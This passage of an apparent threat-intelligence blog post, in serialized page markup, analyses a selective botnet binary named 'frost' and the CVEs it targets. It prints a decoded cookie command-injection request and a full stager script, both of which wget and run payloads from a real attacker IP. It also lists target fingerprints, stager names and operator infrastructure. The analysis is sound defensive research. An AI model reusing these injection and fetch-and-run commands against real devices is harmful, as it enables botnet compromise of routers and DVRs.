\"2025-12-01T13:14:41.919Z\"\n}\n",[886,23723,23724,23728,23748,23764,23784,23804,23822,23838,23858,23878,23893,23912,23924,23943,23963,23981,23986,24004],{"__ignoreMap":219},[1373,23725,23726],{"class":1375,"line":1376},[1373,23727,8904],{"class":1383},[1373,23729,23730,23733,23736,23738,23740,23742,23744,23746],{"class":1375,"line":220},[1373,23731,23732],{"class":9152},"  \"",[1373,23734,23735],{"class":9155},"src_ip",[1373,23737,183],{"class":9152},[1373,23739,4606],{"class":1383},[1373,23741,4883],{"class":9173},[1373,23743,23135],{"class":9176},[1373,23745,183],{"class":9173},[1373,23747,9062],{"class":1383},[1373,23749,23750,23752,23755,23757,23759,23762],{"class":1375,"line":1266},[1373,23751,23732],{"class":9152},[1373,23753,23754],{"class":9155},"src_port",[1373,23756,183],{"class":9152},[1373,23758,4606],{"class":1383},[1373,23760,23761],{"class":5467}," 
55590",[1373,23763,9062],{"class":1383},[1373,23765,23766,23768,23771,23773,23775,23777,23780,23782],{"class":1375,"line":1852},[1373,23767,23732],{"class":9152},[1373,23769,23770],{"class":9155},"src_country",[1373,23772,183],{"class":9152},[1373,23774,4606],{"class":1383},[1373,23776,4883],{"class":9173},[1373,23778,23779],{"class":9176},"NL",[1373,23781,183],{"class":9173},[1373,23783,9062],{"class":1383},[1373,23785,23786,23788,23791,23793,23795,23797,23800,23802],{"class":1375,"line":4692},[1373,23787,23732],{"class":9152},[1373,23789,23790],{"class":9155},"dst_country",[1373,23792,183],{"class":9152},[1373,23794,4606],{"class":1383},[1373,23796,4883],{"class":9173},[1373,23798,23799],{"class":9176},"US",[1373,23801,183],{"class":9173},[1373,23803,9062],{"class":1383},[1373,23805,23806,23808,23810,23812,23814,23816,23818,23820],{"class":1375,"line":4724},[1373,23807,23732],{"class":9152},[1373,23809,242],{"class":9155},[1373,23811,183],{"class":9152},[1373,23813,4606],{"class":1383},[1373,23815,4883],{"class":9173},[1373,23817,23717],{"class":9176},[1373,23819,183],{"class":9173},[1373,23821,9062],{"class":1383},[1373,23823,23824,23826,23829,23831,23833,23836],{"class":1375,"line":4756},[1373,23825,23732],{"class":9152},[1373,23827,23828],{"class":9155},"signature_id",[1373,23830,183],{"class":9152},[1373,23832,4606],{"class":1383},[1373,23834,23835],{"class":5467}," 12700629",[1373,23837,9062],{"class":1383},[1373,23839,23840,23842,23845,23847,23849,23851,23854,23856],{"class":1375,"line":4768},[1373,23841,23732],{"class":9152},[1373,23843,23844],{"class":9155},"signature",[1373,23846,183],{"class":9152},[1373,23848,4606],{"class":1383},[1373,23850,4883],{"class":9173},[1373,23852,23853],{"class":9176},"VULNCHECK ICTBroadcast CVE-2025-2611 Exploit 
Attempt",[1373,23855,183],{"class":9173},[1373,23857,9062],{"class":1383},[1373,23859,23860,23862,23865,23867,23869,23871,23874,23876],{"class":1375,"line":4792},[1373,23861,23732],{"class":9152},[1373,23863,23864],{"class":9155},"category",[1373,23866,183],{"class":9152},[1373,23868,4606],{"class":1383},[1373,23870,4883],{"class":9173},[1373,23872,23873],{"class":9176},"Web Application Attack",[1373,23875,183],{"class":9173},[1373,23877,9062],{"class":1383},[1373,23879,23880,23882,23885,23887,23889,23891],{"class":1375,"line":4798},[1373,23881,23732],{"class":9152},[1373,23883,23884],{"class":9155},"severity",[1373,23886,183],{"class":9152},[1373,23888,4606],{"class":1383},[1373,23890,5468],{"class":5467},[1373,23892,9062],{"class":1383},[1373,23894,23895,23897,23899,23901,23903,23905,23908,23910],{"class":1375,"line":4806},[1373,23896,23732],{"class":9152},[1373,23898,11736],{"class":9155},[1373,23900,183],{"class":9152},[1373,23902,4606],{"class":1383},[1373,23904,4883],{"class":9173},[1373,23906,23907],{"class":9176},"R0VUIC9sb2dpbi5waHAgSFRUUC8xLjANCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBMaW51eCB4ODZfNjQ7IHJ2OjE0MC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzE0MC4wDQpDb29raWU6IEJST0FEQ0FTVD1gd2dldCR7SUZTfWh0dHA6Ly84Ny4xMjEuODQuNTIvbWlzYy5pY3Ricm9hZGNhc3Quc2gke0lGU30tTy18c2hgOyBpY3Ricm9hZGNhc3Q9YHdnZXQke0lGU31odHRwOi8vODcuMTIxLjg0LjUyL21pc2MuaWN0YnJvYWRjYXN0LnNoJHtJRlN9LU8tfHNoYA0KDQo=",[1373,23909,183],{"class":9173},[1373,23911,9062],{"class":1383},[1373,23913,23914,23916,23918,23920,23922],{"class":1375,"line":4817},[1373,23915,23732],{"class":9152},[1373,23917,6277],{"class":9155},[1373,23919,183],{"class":9152},[1373,23921,4606],{"class":1383},[1373,23923,4765],{"class":1383},[1373,23925,23926,23928,23930,23932,23934,23936,23939,23941],{"class":1375,"line":4825},[1373,23927,19050],{"class":9152},[1373,23929,7585],{"class":9165},[1373,23931,183],{"class":9152},[1373,23933,4606],{"class":1383},[1373,23935,4883],{"class":9173},[1373,23937,239
38],{"class":9176},"\u002Flogin.php",[1373,23940,183],{"class":9173},[1373,23942,9062],{"class":1383},[1373,23944,23945,23947,23950,23952,23954,23956,23959,23961],{"class":1375,"line":4835},[1373,23946,19050],{"class":9152},[1373,23948,23949],{"class":9165},"http_user_agent",[1373,23951,183],{"class":9152},[1373,23953,4606],{"class":1383},[1373,23955,4883],{"class":9173},[1373,23957,23958],{"class":9176},"Mozilla\u002F5.0 (X11; Linux x86_64; rv:140.0) Gecko\u002F20100101 Firefox\u002F140.0",[1373,23960,183],{"class":9173},[1373,23962,9062],{"class":1383},[1373,23964,23965,23967,23970,23972,23974,23976,23979],{"class":1375,"line":4843},[1373,23966,19050],{"class":9152},[1373,23968,23969],{"class":9165},"protocol",[1373,23971,183],{"class":9152},[1373,23973,4606],{"class":1383},[1373,23975,4883],{"class":9173},[1373,23977,23978],{"class":9176},"HTTP\u002F1.0",[1373,23980,19057],{"class":9173},[1373,23982,23983],{"class":1375,"line":4849},[1373,23984,23985],{"class":1383},"  },\n",[1373,23987,23988,23990,23993,23995,23997,23999,24002],{"class":1375,"line":4877},[1373,23989,23732],{"class":9152},[1373,23991,23992],{"class":9155},"timestamp",[1373,23994,183],{"class":9152},[1373,23996,4606],{"class":1383},[1373,23998,4883],{"class":9173},[1373,24000,24001],{"class":9176},"2025-12-01T13:14:41.919Z",[1373,24003,19057],{"class":9173},[1373,24005,24006],{"class":1375,"line":4915},[1373,24007,1855],{"class":1383},[18,24009,24010],{},"Decoding the payload field reveals the attacker's exploit:",[1354,24012,24015],{"className":24013,"code":24014,"language":1359,"meta":219},[1357],"GET \u002Flogin.php HTTP\u002F1.0\nHost: VC_REDACTED\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64; rv:140.0) Gecko\u002F20100101 Firefox\u002F140.0\nCookie: BROADCAST=`wget${IFS}http:\u002F\u002F87.121.84.52\u002Fmisc.ictbroadcast.sh${IFS}-O-|sh`; 
ictbroadcast=`wget${IFS}http:\u002F\u002F87.121.84.52\u002Fmisc.ictbroadcast.sh${IFS}-O-|sh`\n",[886,24016,24014],{"__ignoreMap":219},[18,24018,24019,24020,24027,24028,24031],{},"As we covered in our earlier write up, ",[1131,24021,24022],{},[47,24023,24026],{"href":24024,"rel":24025},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fictbroadcast-kev",[51],"ICTBroadcast Command Injection Actively Exploited (CVE-2025-2611)",", exploitation runs through the Cookie field. Here the attacker pulls down a ",[886,24029,24030],{},"misc.ictbroadcast.sh"," script from the same host and executes it with sh. The script is the usual multi-architecture stager. The full script is shown below:",[1354,24033,24036],{"className":24034,"code":24035,"language":1359,"meta":219},[1357],"cd \u002Ftmp || cd \u002Fvar\u002Ftmp || cd \u002Fvar || cd \u002Fmnt || cd \u002Fdev || cd \u002F\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.armv7 -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.armv6 -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.armv5 -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.mips -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.mipsel -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.aarch64 -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.armv7b -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.x86 -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.x86_64 -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nrm 
misc.ictbroadcast.sh\n",[886,24037,24035],{"__ignoreMap":219},[18,24039,24040,24041,24044],{},"The attacker downloads several architecture-specific versions of a binary they name ",[886,24042,24043],{},"frost",", runs each one in turn, deletes them, and then deletes the stager.",[18,24046,2245,24047,24049],{},[886,24048,24043],{}," binary combines DDoS tooling with spreader logic that includes fourteen exploits for fifteen CVEs. The important part is how it spreads. The operator is not carpet bombing the internet with exploits. `frost` checks the target first and only proceeds with exploitation when it sees the specific indicators it expects.",[18,24051,24052,24053,24055,24056,24061,24062,24064,24065,24068,24069,24072],{},"For example, ",[886,24054,24043],{}," will only exploit ",[47,24057,24060],{"href":24058,"rel":24059},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-1610",[51],"CVE-2025-1610"," after first receiving an HTTP response to ",[886,24063,12012],{}," that contains ",[886,24066,24067],{},"Set-Cookie: user=(null)"," and then a follow-on response to a second request that contains ",[886,24070,24071],{},"Set-Cookie: user=admin",". If those markers are not there, it does nothing. If they are, it commits. This is the kind of selective behavior our canaries catch.",[18,24074,24075,24076,24078],{},"The table below shows how far this selectivity goes. 
Each exploit path has its own fingerprint checks, and ",[886,24077,24043],{}," will only run the exploit when those conditions match.",[307,24080,24081,24093],{},[310,24082,24083],{},[313,24084,24085,24089,24091],{},[316,24086,24088],{"align":24087},"left","Match Condition",[316,24090,319],{"align":24087},[316,24092,3581],{"align":24087},[336,24094,24095,24110,24125,24138,24153,24167,24180,24195,24210,24230,24245,24260,24275,24290],{},[313,24096,24097,24100,24107],{},[341,24098,24099],{"align":24087},"Basic realm=\"DVR”",[341,24101,24102],{"align":24087},[47,24103,24106],{"href":24104,"rel":24105},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-34132",[51],"CVE-2025-34132",[341,24108,24109],{"align":24087},"Lilin",[313,24111,24112,24115,24122],{},[341,24113,24114],{"align":24087},"Server: GoAhead-Webs + JS Content",[341,24116,24117],{"align":24087},[47,24118,24121],{"href":24119,"rel":24120},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2017-18377",[51],"CVE-2017-18377",[341,24123,24124],{"align":24087},"WifiCam",[313,24126,24127,24130,24135],{},[341,24128,24129],{"align":24087},"Set-Cookie: user=(null) + Set-Cookie: user=admin",[341,24131,24132],{"align":24087},[47,24133,24060],{"href":24058,"rel":24134},[51],[341,24136,24137],{"align":24087},"LBLink",[313,24139,24140,24143,24150],{},[341,24141,24142],{"align":24087},"Server: lighttpd",[341,24144,24145],{"align":24087},[47,24146,24149],{"href":24147,"rel":24148},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-34152",[51],"CVE-2025-34152",[341,24151,24152],{"align":24087},"Shenzhen 
Aitemi",[313,24154,24155,24157,24164],{},[341,24156,24142],{"align":24087},[341,24158,24159],{"align":24087},[47,24160,24163],{"href":24161,"rel":24162},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-46574",[51],"CVE-2023-46574",[341,24165,24166],{"align":24087},"TOTOLINK",[313,24168,24169,24171,24178],{},[341,24170,24142],{"align":24087},[341,24172,24173],{"align":24087},[47,24174,24177],{"href":24175,"rel":24176},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2022-40475",[51],"CVE-2022-40475",[341,24179,24166],{"align":24087},[313,24181,24182,24185,24192],{},[341,24183,24184],{"align":24087},"AuthInfo:",[341,24186,24187],{"align":24087},[47,24188,24191],{"href":24189,"rel":24190},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2018-25126",[51],"CVE-2018-25126",[341,24193,24194],{"align":24087},"TVT",[313,24196,24197,24200,24207],{},[341,24198,24199],{"align":24087},"URL=\u002Fwebpages\u002Flogin.html",[341,24201,24202],{"align":24087},[47,24203,24206],{"href":24204,"rel":24205},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-1389",[51],"CVE-2023-1389",[341,24208,24209],{"align":24087},"TP-Link",[313,24211,24212,24215,24227],{},[341,24213,24214],{"align":24087},"Server: httpd_four-faith",[341,24216,24217,1246,24222],{"align":24087},[47,24218,24221],{"href":24219,"rel":24220},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-9644",[51],"CVE-2024-9644",[47,24223,24226],{"href":24224,"rel":24225},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-12856",[51],"CVE-2024-12856",[341,24228,24229],{"align":24087},"Four Faith",[313,24231,24232,24235,24242],{},[341,24233,24234],{"align":24087},"Server: Http 
Server",[341,24236,24237],{"align":24087},[47,24238,24241],{"href":24239,"rel":24240},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2020-10987",[51],"CVE-2020-10987",[341,24243,24244],{"align":24087},"Tenda",[313,24246,24247,24250,24257],{},[341,24248,24249],{"align":24087},"Location: \u002Flogin.rsp",[341,24251,24252],{"align":24087},[47,24253,24256],{"href":24254,"rel":24255},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-3721",[51],"CVE-2024-3721",[341,24258,24259],{"align":24087},"TBK DVR",[313,24261,24262,24265,24272],{},[341,24263,24264],{"align":24087},"Server: FSM-Webs",[341,24266,24267],{"align":24087},[47,24268,24271],{"href":24269,"rel":24270},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-7311",[51],"CVE-2023-7311",[341,24273,24274],{"align":24087},"BYTEVALUE",[313,24276,24277,24280,24287],{},[341,24278,24279],{"align":24087},"Server: DWS",[341,24281,24282],{"align":24087},[47,24283,24286],{"href":24284,"rel":24285},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-12987",[51],"CVE-2024-12987",[341,24288,24289],{"align":24087},"Draytek",[313,24291,24292,24295,24302],{},[341,24293,24294],{"align":24087},"Server: jjhttpd",[341,24296,24297],{"align":24087},[47,24298,24301],{"href":24299,"rel":24300},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2021-45382",[51],"CVE-2021-45382",[341,24303,24304],{"align":24087},"D-Link",[18,24306,24307],{},"Some match conditions are very specific, such as CVE-2025-1610 and CVE-2017-18377, which requires the GoAhead-Webs banner and specific JavaScript content. Others are much looser. CVE-2022-40475, for example, only checks for a lighttpd server banner.",[18,24309,24310,24311,24313,24314,24317,24318,24321,24322,24325,24326,59],{},"Each exploit works in a similar way. Successful exploitation downloads a stager script, and the stager retrieves the secondary binary (a DDoS and spreader tool, ",[886,24312,24043],{},"). 
The attacker has named each stager according to the exploited target. For example, CVE-2023-7311 uses ",[886,24315,24316],{},"router.bytevalue-rep.sh"," and CVE-2025-34132 uses ",[886,24319,24320],{},"dvr.lilin-rep.sh",". All of them follow the same ",[886,24323,24324],{},"\u003Chost-type>.\u003Cvendor>-rep.sh"," naming pattern. Even the ICTBroadcast path follows this format with ",[886,24327,24030],{},[18,24329,24330],{},[68,24331],{"alt":24332,"src":24333},"Script pattern in frost exploit","\u002Fblog\u002Ffrost-checks-first\u002Faitemi-exploit.png",[18,24335,24336],{},"The table below summarizes all fourteen stager names and their associated CVEs.",[307,24338,24339,24348],{},[310,24340,24341],{},[313,24342,24343,24345],{},[316,24344,319],{"align":24087},[316,24346,24347],{"align":24087},"Stager Name",[336,24349,24350,24359,24368,24378,24388,24398,24408,24418,24428,24438,24451,24461,24471,24480,24490],{},[313,24351,24352,24357],{},[341,24353,24354],{"align":24087},[47,24355,23717],{"href":23715,"rel":24356},[51],[341,24358,24030],{"align":24087},[313,24360,24361,24366],{},[341,24362,24363],{"align":24087},[47,24364,24106],{"href":24104,"rel":24365},[51],[341,24367,24320],{"align":24087},[313,24369,24370,24375],{},[341,24371,24372],{"align":24087},[47,24373,24121],{"href":24119,"rel":24374},[51],[341,24376,24377],{"align":24087},"ipcam.goahead-rep.sh",[313,24379,24380,24385],{},[341,24381,24382],{"align":24087},[47,24383,24060],{"href":24058,"rel":24384},[51],[341,24386,24387],{"align":24087},"router.lblink-rep.sh",[313,24389,24390,24395],{},[341,24391,24392],{"align":24087},[47,24393,24149],{"href":24147,"rel":24394},[51],[341,24396,24397],{"align":24087},"router.aitemi-rep.sh",[313,24399,24400,24405],{},[341,24401,24402],{"align":24087},[47,24403,24163],{"href":24161,"rel":24404},[51],[341,24406,24407],{"align":24087},"router.totolink-rep.sh",[313,24409,24410,24415],{},[341,24411,24412],{"align":24087},[47,24413,24177],{"href":24175,"rel":24414},[51],[341,24416,2
4417],{"align":24087},"router.totolink2-rep.sh",[313,24419,24420,24425],{},[341,24421,24422],{"align":24087},[47,24423,24191],{"href":24189,"rel":24424},[51],[341,24426,24427],{"align":24087},"dvr.tvt-rep.sh",[313,24429,24430,24435],{},[341,24431,24432],{"align":24087},[47,24433,24206],{"href":24204,"rel":24434},[51],[341,24436,24437],{"align":24087},"router.tplink-rep.sh",[313,24439,24440,24448],{},[341,24441,24442,1246,24445],{"align":24087},[47,24443,24221],{"href":24219,"rel":24444},[51],[47,24446,24226],{"href":24224,"rel":24447},[51],[341,24449,24450],{"align":24087},"router.faith-rep.sh",[313,24452,24453,24458],{},[341,24454,24455],{"align":24087},[47,24456,24241],{"href":24239,"rel":24457},[51],[341,24459,24460],{"align":24087},"router.tenda-rep.sh",[313,24462,24463,24468],{},[341,24464,24465],{"align":24087},[47,24466,24256],{"href":24254,"rel":24467},[51],[341,24469,24470],{"align":24087},"dvr.tbk-rep.sh",[313,24472,24473,24478],{},[341,24474,24475],{"align":24087},[47,24476,24271],{"href":24269,"rel":24477},[51],[341,24479,24316],{"align":24087},[313,24481,24482,24487],{},[341,24483,24484],{"align":24087},[47,24485,24286],{"href":24284,"rel":24486},[51],[341,24488,24489],{"align":24087},"router.draytek-rep.sh",[313,24491,24492,24497],{},[341,24493,24494],{"align":24087},[47,24495,24301],{"href":24299,"rel":24496},[51],[341,24498,24499],{"align":24087},"router.dlink-rep.sh",[18,24501,24502,24503,24508,24509,24514],{},"This naming scheme allows us to query honeypot datasets such as ",[47,24504,24507],{"href":24505,"rel":24506},"https:\u002F\u002Fisc.sans.edu\u002Ffeeds_doc.html",[51],"SANS Web Honeypot Data"," for related activity. As of this writing, none of the stager names appear in the SANS ",[47,24510,24513],{"href":24511,"rel":24512},"https:\u002F\u002Fisc.sans.edu\u002Ffeeds\u002Furlsummary.txt",[51],"urlsummary.txt"," feed. This is consistent with the operator's behavior. 
The stagers are only delivered to targets that satisfy the match conditions, and some of our canaries fall into that category.",[18,24516,24517,24518,24520,24521,1246,24524,1246,24527,1255,24530,24533,24534,24537,24538,24541,24542,24547,24548,24550],{},"Beyond the stagers and match conditions, the vulnerability set itself is notable. Only four of the CVEs targeted by ",[886,24519,24043],{}," are included in the CISA Known Exploited Vulnerabilities catalog (",[47,24522,24241],{"href":24239,"rel":24523},[51],[47,24525,24301],{"href":24299,"rel":24526},[51],[47,24528,24206],{"href":24204,"rel":24529},[51],[47,24531,24286],{"href":24284,"rel":24532},[51],"). At the time of discovery, all but one appeared in the free ",[47,24535,1233],{"href":10806,"rel":24536},[51],". The remaining CVE, ",[47,24539,24060],{"href":24058,"rel":24540},[51],", is unusual because VulnCheck Exploit and Vulnerability Intelligence currently indexes only a single proof of concept for it, and that ",[47,24543,24546],{"href":24544,"rel":24545},"https:\u002F\u002Fnoisy-caravel-a9a.notion.site\u002FLBLINK_AC1900_V1-0-2_-set_blacklist-_-bs_SetMacBlack-_CI-179898c94eac802b9451fcb79aa668c3",[51],"PoC"," is a Notion document. 
No Nuclei template or Metasploit module exists for it, yet the implementation in ",[886,24549,24043],{}," matches the Notion document precisely.",[18,24552,24553,24554,24556],{},"The corresponding implementation inside ",[886,24555,24043],{}," is shown in the disassembly below.",[18,24558,24559],{},[68,24560],{"alt":24561,"src":24562},"CVE-2025-1610 implementation in frost","\u002Fblog\u002Ffrost-checks-first\u002Flblink-exploit.png",[18,24564,24565,24566,1246,24571,1246,24576,1246,24581,1246,24586,1246,24591,1246,24596,1246,24601,1246,24606,1246,24611,1246,24616,1246,24621,1246,24626,1246,24631,1246,24636,1246,24641,1246,24646,1246,24651,1255,24656,24661],{},"VulnCheck Exploit and Vulnerability Intelligence links the remaining CVEs to nineteen different botnets, including ",[47,24567,24570],{"href":24568,"rel":24569},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=IZ1H9",[51],"IZ1H9",[47,24572,24575],{"href":24573,"rel":24574},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Beastmode",[51],"Beastmode",[47,24577,24580],{"href":24578,"rel":24579},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=RustoBot",[51],"RustoBot",[47,24582,24585],{"href":24583,"rel":24584},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=RondoDox",[51],"RondoDox",[47,24587,24590],{"href":24588,"rel":24589},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Mirai",[51],"Mirai",[47,24592,24595],{"href":24593,"rel":24594},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=ShadowV2",[51],"ShadowV2",[47,24597,24600],{"href":24598,"rel":24599},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=AISURU",[51],"AISURU",[47,24602,24605],{"href":24603,"rel":24604},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Moobot",[51],"Moobot",[47,24607,24610],{"href":24608,"rel":24609},"https:\u002F\u002Fa
pi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Gitpaste-12",[51],"Gitpaste-12",[47,24612,24615],{"href":24613,"rel":24614},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=BotenaGo",[51],"BotenaGo",[47,24617,24620],{"href":24618,"rel":24619},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Zerobot",[51],"Zerobot",[47,24622,24625],{"href":24623,"rel":24624},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Gayfemboy",[51],"Gayfemboy",[47,24627,24630],{"href":24628,"rel":24629},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Ballista",[51],"Ballista",[47,24632,24635],{"href":24633,"rel":24634},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Skibidi",[51],"Skibidi",[47,24637,24640],{"href":24638,"rel":24639},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=XoRBot",[51],"XoRBot",[47,24642,24645],{"href":24643,"rel":24644},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Androxgh0st",[51],"Androxgh0st",[47,24647,24650],{"href":24648,"rel":24649},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Condi",[51],"Condi",[47,24652,24655],{"href":24653,"rel":24654},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=AGoent",[51],"AGoent",[47,24657,24660],{"href":24658,"rel":24659},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Gafgyt",[51],"Gafgyt",". In other words, this operator is not working new or unexplored ground. They are using the same vulnerabilities that many other botnets rely on. Most of these CVEs are also not in the CISA KEV, which highlights how much active exploitation activity occurs outside that list.",[18,24663,10402,24664,24667,24668,24670],{},[47,24665,1251],{"href":1249,"rel":24666},[51]," data shows that the number of internet-exposed systems vulnerable to these bugs is small. 
Across the vulnerabilities we track, the global population is under ten thousand. This limits how large a botnet built on these CVEs can get, which makes this operator a relatively small player. It also highlights something interesting about this campaign. The ",[886,24669,24043],{}," binary does not contain the ICTBroadcast exploit that was used to deliver it in the first place, so the operator clearly has additional exploits in rotation that are not present in the sample. The table below breaks the population out by CVE.",[307,24672,24673,24684],{},[310,24674,24675],{},[313,24676,24677,24679,24681],{},[316,24678,319],{"align":24087},[316,24680,3581],{"align":24087},[316,24682,24683],{"align":24087},"IP Intel Count",[336,24685,24686,24699,24711,24723,24739,24751,24764,24775],{},[313,24687,24688,24693,24696],{},[341,24689,24690],{"align":24087},[47,24691,23717],{"href":23715,"rel":24692},[51],[341,24694,24695],{"align":24087},"ICTBroadcast",[341,24697,24698],{"align":24087},"10",[313,24700,24701,24706,24708],{},[341,24702,24703],{"align":24087},[47,24704,24149],{"href":24147,"rel":24705},[51],[341,24707,24152],{"align":24087},[341,24709,24710],{"align":24087},"195",[313,24712,24713,24718,24720],{},[341,24714,24715],{"align":24087},[47,24716,24206],{"href":24204,"rel":24717},[51],[341,24719,24209],{"align":24087},[341,24721,24722],{"align":24087},"5525",[313,24724,24725,24733,24736],{},[341,24726,24727,1246,24730],{"align":24087},[47,24728,24221],{"href":24219,"rel":24729},[51],[47,24731,24226],{"href":24224,"rel":24732},[51],[341,24734,24735],{"align":24087},"Four-Faith",[341,24737,24738],{"align":24087},"288",[313,24740,24741,24746,24748],{},[341,24742,24743],{"align":24087},[47,24744,24241],{"href":24239,"rel":24745},[51],[341,24747,24244],{"align":24087},[341,24749,24750],{"align":24087},"526",[313,24752,24753,24758,24761],{},[341,24754,24755],{"align":24087},[47,24756,24256],{"href":24254,"rel":24757},[51],[341,24759,24760],{"align":24087},"TBK",[341,24762,24763
],{"align":24087},"937",[313,24765,24766,24771,24773],{},[341,24767,24768],{"align":24087},[47,24769,24271],{"href":24269,"rel":24770},[51],[341,24772,24274],{"align":24087},[341,24774,467],{"align":24087},[313,24776,24777,24782,24784],{},[341,24778,24779],{"align":24087},[47,24780,24286],{"href":24284,"rel":24781},[51],[341,24783,24289],{"align":24087},[341,24785,24786],{"align":24087},"362",[18,24788,24789],{},"With the victim side mapped out, we can look at the operator's footprint online.",[18,24791,24792,24793,24795,24796,24798,24799,1246,24802,1255,24805,24808,24809,24811],{},"The canary-observed activity originates from ",[886,24794,23135],{},". This host is launching the exploitation attempts and also serves the stager scripts and the ",[886,24797,24043],{}," binaries over HTTP on port 80. Inside the binary we see references to three domains that resolve to this same IP: ",[886,24800,24801],{},"krebs.strangled.net",[886,24803,24804],{},"mreow.jumpingcrab.com",[886,24806,24807],{},"xlab.ignorelist.com",". Shodan shows the host exposing additional exploit related behavior on TCP port 2, which matches what we see in our canaries and strongly suggests that ",[886,24810,23135],{}," is the operator's primary system.",[18,24813,24814],{},[68,24815],{"alt":24816,"src":24817},"Primary infra on Shodan","\u002Fblog\u002Ffrost-checks-first\u002Finfra1.png",[18,24819,24820,24821,24824,24825,24828,24829,59],{},"We also saw a second host, ",[886,24822,24823],{},"176.65.148.246",", that may be related. Shodan shows that host also using the same ",[886,24826,24827],{},"220 meow :3"," banner seen on the primary host, giving it a loose connection to the same operator. 
That link is slightly strengthened by similar exploit behavior reported in ",[47,24830,24833],{"href":24831,"rel":24832},"https:\u002F\u002Fwww.abuseipdb.com\u002Fcheck\u002F176.65.148.246",[51],"AbuseIPDB",[18,24835,24836],{},[68,24837],{"alt":24838,"src":24839},"Possible infra on Shodan","\u002Fblog\u002Ffrost-checks-first\u002Finfra2.png",[18,24841,24842,24843,24846,24847,24849,24850,24854],{},"Taken together, the evidence points to a small, targeted operation. The vulnerable population is small, as shown by our ",[47,24844,1251],{"href":1249,"rel":24845},[51]," data, and the strict match conditions inside ",[886,24848,24043],{}," allow the operator to avoid most honeypots. The CVEs themselves are well-known. ",[47,24851,24853],{"href":1258,"rel":24852},[51],"VulnCheck Exploit & Vulnerability Intelligence"," associates them with numerous botnets, and while most do not appear in the CISA KEV, nearly all are included in the free VulnCheck KEV. Notably, the ICTBroadcast exploit that delivered this sample does not appear in the binary, which indicates the operator has additional capabilities not visible here. Our canaries revealed this activity because they emulate the expected behavior of real systems.",[1920,24856,202],{"id":201},[18,24858,10768,24859,1246,24862,10775,24865,24868],{},[47,24860,283],{"href":281,"rel":24861},[51],[47,24863,216],{"href":1258,"rel":24864},[51],[47,24866,1251],{"href":1249,"rel":24867},[51]," datasets. 
